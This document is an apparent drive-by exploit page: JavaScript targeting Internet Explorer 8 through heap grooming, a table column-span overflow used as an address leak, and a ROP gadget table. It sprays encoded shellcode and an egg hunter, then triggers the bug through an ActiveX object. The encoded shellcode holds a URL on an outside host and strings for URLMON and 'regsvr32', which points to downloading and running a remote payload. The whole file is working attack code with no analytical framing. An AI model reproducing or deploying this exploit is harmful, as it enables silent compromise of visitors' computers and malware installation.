- <script type='text/javascript'>
- function heapLib() {}
- heapLib.ie = function(m) {
- this.pd = "%u0c0c%u0c0c";
- while (4 + this.pd.length*2 + 2 < this.m) {
- this.pd += this.pd;
- }
- this.me = new Array();
- this.me["0"] = new Array();
- this.me["1"] = new Array();
- CollectGarbage();
- this.hlFillbins();
- };
- heapLib.ie.prototype.hlFillbins = function() {
- for (var i = 0; i < 6; i++) {
- this.me["0"].push(this.pd.substr(0, (32-6)/2));
- this.me["0"].push(this.pd.substr(0, (64-6)/2));
- this.me["0"].push(this.pd.substr(0, (256-6)/2));
- this.me["0"].push(this.pd.substr(0, (32768-6)/2));
- }
- };
- heapLib.ie.prototype.heapLib_alloc = function(a) {
- if (typeof a == "string" || a instanceof String) {
- this.me["1"].push(a.substr(0, a.length));
- }
- };
- heapLib.ie.prototype.heapLib_GC = function() {
- delete this.me["0"];
- this.me["0"] = new Array();
- CollectGarbage();
- this.hlFillbins();
- };
- heapLib.ie.prototype.heapLib_release = function() {
- delete this.me["1"];
- delete this.me["0"];
- CollectGarbage();
- };
- var heapObj = new heapLib.ie(0x20000);
- var ropGadgets;
- var ropGadgetsTable_IE8 = new Array(
- new Array(0xAE08, 0x0, 0x1FAE08, 0x2E4E3, 0x5C4B, 0x5C4A, 0x1318, 0x3F7FB, 0x25B84),
- new Array(0x80C8, 0, 0x2080C8, 0x2CE36, 0x4E65, 0x4E64, 0x1340, 0x3F3CF, 0x62B0),
- new Array(0x7A98, 0, 0x207A98, 0x2D00E, 0x4EA9, 0x4EA8, 0x137C, 0x3F54D, 0x1E924),
- new Array(0x7B58, 0, 0x207B58, 0x2D05E, 0x4EA9, 0x4EA8, 0x137C, 0x3F5ED, 0x1E914),
- new Array(0x7FC8, 0x8160, 0x207FC8, 0x2D314, 0x4EA1, 0x4EA0, 0x137C, 0x3F8F3, 0x1E9A4),
- new Array(0x7DF8, 0x7F90, 0x207DF8, 0x2D174, 0x4EA1, 0x4EA0, 0x137C, 0x3F703, 0x1E804),
- new Array(0x7DF8, 0x7F98, 0x207DF8, 0x2D20C, 0x4EC1, 0x4EC0, 0x1368, 0x3F677, 0x1E844),
- new Array(0x7DD8, 0x0, 0x207DD8, 0x176C, 0x4ED9, 0x4ED8, 0x1374, 0x3F6D7, 0x13739),
- new Array(0x7EF8, 0x8090, 0x207EF8, 0x2CDD6, 0x4E65, 0x4E64, 0x1340, 0x3F39F, 0x1E844),
- new Array(0x7BB8, 0x7D58, 0x207BB8, 0x2D170, 0x4EA1, 0x4EA0, 0x1368, 0x3F5F7, 0x1E7E4),
- new Array(0x7F58, 0x80F8, 0x207F58, 0x2D190, 0x4EA1, 0x4EA0, 0x1368, 0x3F637, 0x91C5F),
- new Array(0x3AF8, 0x0, 0x173AF8, 0x117EF, 0x1148E, 0x1148D, 0x1308, 0x9F5C9, 0x2D7FE),
- new Array(0x3930, 0x3AC8, 0x173930, 0x118FF, 0x1159E, 0x1159D, 0x134C, 0x9F4D1, 0x2D83E),
- new Array(0x3A70, 0x3C10, 0x173A70, 0x1191B, 0x115BA, 0x115B9, 0x133C, 0x9F661, 0x2D8DE),
- new Array(0x8668, 0x8800, 0x158668, 0x1B44B, 0x14F08, 0x14F07, 0x1348, 0x6F0EB, 0x2CCAE),
- new Array(0x8628, 0x87C0, 0x158628, 0x1B4EF, 0x14FA8, 0x14FA7, 0x134C, 0x6F1DB, 0x2CDEE),
- new Array(0x8528, 0x86C0, 0x158528, 0x1B4EF, 0x14FA8, 0x14FA7, 0x134C, 0x6F0DB, 0x2CDAE),
- new Array(0x82D8, 0x8478, 0x1582D8, 0x1B4E3, 0x14F88, 0x14F87, 0x133C, 0x6EFC3, 0x2CD96)
- );
- var fillbuff = new Array();
- function randString(p, s)
- {
- var r1=Math.floor(Math.random()*90)+10;
- var r2=Math.floor(Math.random()*90)+10;
- var r3=Math.floor(Math.random()*90)+10;
- var r4=Math.floor(Math.random()*90)+10;
- var ps = "%u" + r1.toString() + r2.toString()
- ps += "%u" + r3.toString() + r4.toString()
- var pa = unescape(ps);
- while (pa.length < s) pa+= pa;
- pa = p + pa.substr(0, s - p.length);
- return pa;
- }
- function LoadIeColSpan() {
- var div_container = document.getElementById("heap_allign");
- div_container.style.cssText = "display:none";
- // VIPOLNYAT ODNIM KUSKOM
- for (var i = 0; i < 4000; i += 4) {
- fillbuff[i] = randString('', 125);
- fillbuff[i+1] = randString('', 125);
- fillbuff[i+2] = randString('', 125);
- fillbuff[i+3] = document.createElement("button");
- div_container.appendChild(fillbuff[i+3]);
- }
- for (var i = 0; i < 4000; i += 4) {
- fillbuff[i] = null;
- }
- CollectGarbage();
- // END VIPOLNYAT ODNIM KUSKOM
- var oForTable = document.getElementById("table_div");
- oForTable.width = "51px";
- oForTable.style.width = "51px";
- oForTable.style.height = "1px";
- oForTable.style.overflow = "auto";
- var oTable = document.createElement("table");
- oTable.style.tableLayout = "fixed";
- oTable.style.visibility = "visible";
- oTable.width = "51";
- oTable.height = "1";
- oForTable.appendChild(oTable);
- var oRow = oTable.insertRow();
- var oColGroup = document.createElement("COLGROUP");
- oColGroup.width = "1px";
- oTable.appendChild(oColGroup);
- var oCol = document.createElement("COL");
- oCol.id = "table_col_id";
- oCol.width = "41";
- oCol.height = "1";
- oCol.span = "9";
- oColGroup.appendChild(oCol);
- var oCell = oRow.insertCell();
- oCell.innerHTML = " ";
- var oTbody = document.createElement("TBODY");
- CollectGarbage();
- setTimeout(function(){overwrite()}, 500);
- }
- var sprayContaner = new Array();
- function toUnescape(k) {
- return String.fromCharCode(k & 0xFFFF, k >> 16);
- }
- function heap_spray(r) {
- shellcode = unescape("%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u352f%u3031%u6232%u3735%u3833%u3639%u6137%u612e%u6d64%u6e69%u7268%u6573%u7672%u6369%u7365%u6f2e%u6772%u6e2f%u7765%u2f73%u6970%u7363%u6e2f%u7765%u702e%u676e%u0000");
- var eghunter = unescape("%uE485%u3575%u5FE9%uC033%u8B64%u3040%u408B%u8B0C%u1C70%u56FC%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5075%uEBE9%u514B%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E%uDD03%u8B66%u4B0C%u468D%uFFEC%u2454%u8B0C%u03D8%u8BDD%u8B04%uC503%u5EAB%uC359%u70EB%u8BAD%u2068%u7D80%u330C%u0374%uEB96%u8BF3%u0868%uF78B%u036A%uE859%uFF99%uFFFF%uF9E2%uC033%uB866%u001C%uE02B%uDC8B%uC933%u5951%uB966%uFFFF%u8141%uFFF9%uFFFF%u777F%u515C%u1C6A%u5153%u16FF%uC085%uE774%u7B81%u0010%u0010%u7500%u81DE%u187B%u0000%u0002%uD575%u7B83%u0414%uCF75%uC933%u07B1%u038B%u448B%u2488%u548B%u0C8E%uD03B%uBD75%uF0E2%u02EB%u25EB%uC68B%uC083%u500C%u406A%u438B%u500C%u438B%u5004%u56FF%u6404%u258B%u0000%u0000%u338B%uC683%uFF24%uFFE6%u0856%uE890%uFEE1%uFFFF%uC8AA%uA3C8%uC61B%u7946%uD87E%u73E2");
- var token = shellcode.substr(0, 16);
- var code = unescape("%ue02C%u105a");
- code += toUnescape(ropGadgets[4]);
- code += toUnescape(ropGadgets[5]);
- code += toUnescape(ropGadgets[3]);
- code += toUnescape(ropGadgets[4]);
- code += toUnescape(ropGadgets[4]);
- code += toUnescape(ropGadgets[5]);
- code += toUnescape(ropGadgets[4]);
- code += toUnescape(ropGadgets[5]);
- code += toUnescape(ropGadgets[6]);
- code += toUnescape(ropGadgets[7]);
- code += toUnescape(ropGadgets[8]);
- code += unescape("%uE06C%u105A");
- code += unescape("%u0000%u105A");
- code += unescape("%u0000%u0001");
- code += unescape("%u0040%u0000");
- code += unescape("%uE000%u105A");
- code += eghunter;
- code += token;
- var nops = unescape("%uCCCC%uCCCC");
- while (nops.length < 4096) nops += nops;
- var junk_offset = nops.substring(0, 0x2);
- var block = junk_offset + code + nops.substring(0, 4096 - code.length - junk_offset.length);
- while (block.length < 100000) block += block;
- while (shellcode.length < 100000) shellcode += shellcode;
- var f = block.substring(0, 64*1024/2);
- var a = shellcode.substring(0, 64*1024/2);
- for (i=0; i<14; i++) {
- f += block.substr(0, 64*1024/2);
- }
- f += block.substr(0, (60*1024/2)-(38/2));
- for (i=0; i<14; i++) {
- a += shellcode.substr(0, 64*1024/2);
- }
- a += shellcode.substr(0, (60*1024/2)-(38/2));
- for (i=0; i < 400; i++) {
- sprayContaner[i] = heapObj.heapLib_alloc(f);
- }
- for (i=400; i < 500; i++) {
- sprayContaner[i] = heapObj.heapLib_alloc(a);
- }
- }
- function overwrite() {
- var oCol = document.getElementById("table_col_id");
- if (oCol != null) {
- oCol.width = "42765";
- oCol.span = "19";
- setTimeout(function(){findLeak()}, 500);
- }
- }
- function findLeak() {
- var leak_addr1 = -1;
- var leak_addr2 = -1;
- var leak_index = -1;
- for (var i = 1; i < 4000; i += 4)
- {
- var offset = 0;
- if (fillbuff[i].length > (0x100-6)/2)
- {
- leak_index = i;
- offset = ((0x100-6)/2 + (2 + 8)/2) * 2 + 2;
- leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
- leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);
- if (leak_addr1 == 0x430043) {
- offset += 16;
- leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
- leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);
- }
- }
- if (fillbuff[i + 1].length > (0x100-6)/2)
- {
- leak_index = i + 1;
- offset = (0x100-6)/2 + (2 + 8)/2;
- leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
- leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);
- }
- if (leak_index != -1)
- {
- if (leak_addr1 < 0x100000) {
- leak_addr1 = 0;
- leak_index = -1;
- break;
- }
- for (var i = 0; i < ropGadgetsTable_IE8.length; i++)
- {
- if (((leak_addr1 & 0xFFFF) == ropGadgetsTable_IE8[i][0]) &&
- ((ropGadgetsTable_IE8[i][1] == 0x0) ||
- ((leak_addr2 & 0xFFFF) == ropGadgetsTable_IE8[i][1])))
- {
- ropGadgets = ropGadgetsTable_IE8[i];
- leak_addr1 -= ropGadgets[2];
- break;
- }
- }
- if (ropGadgets == null) {
- leak_addr1 = 0;
- leak_index = -1;
- }
- break;
- }
- }
- if (leak_index != -1)
- {
- if (ropGadgets != null) {
- for (var i = 0; i < ropGadgets.length; i++) {
- ropGadgets[i] += leak_addr1;
- }
- }
- heap_spray();
- var obj = document.createElement("object");
- obj.classid = "clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4";
- document.body.appendChild(obj);
- obj = obj.object;
- var src = unescape("%ue028%u105a");
- while (src.length < 0x1002) src += src;
- src = "\\\\xxx" + src;
- src = src.substr(0, 0x1000 - 10);
- var pic = document.createElement("img");
- pic.src = src;
- pic.nameProp;
- try {
- obj.definition(0);
- obj.definition(definition);
- obj.definition;
- } catch(e) { }
- }
- }
- LoadIeColSpan();
- </script>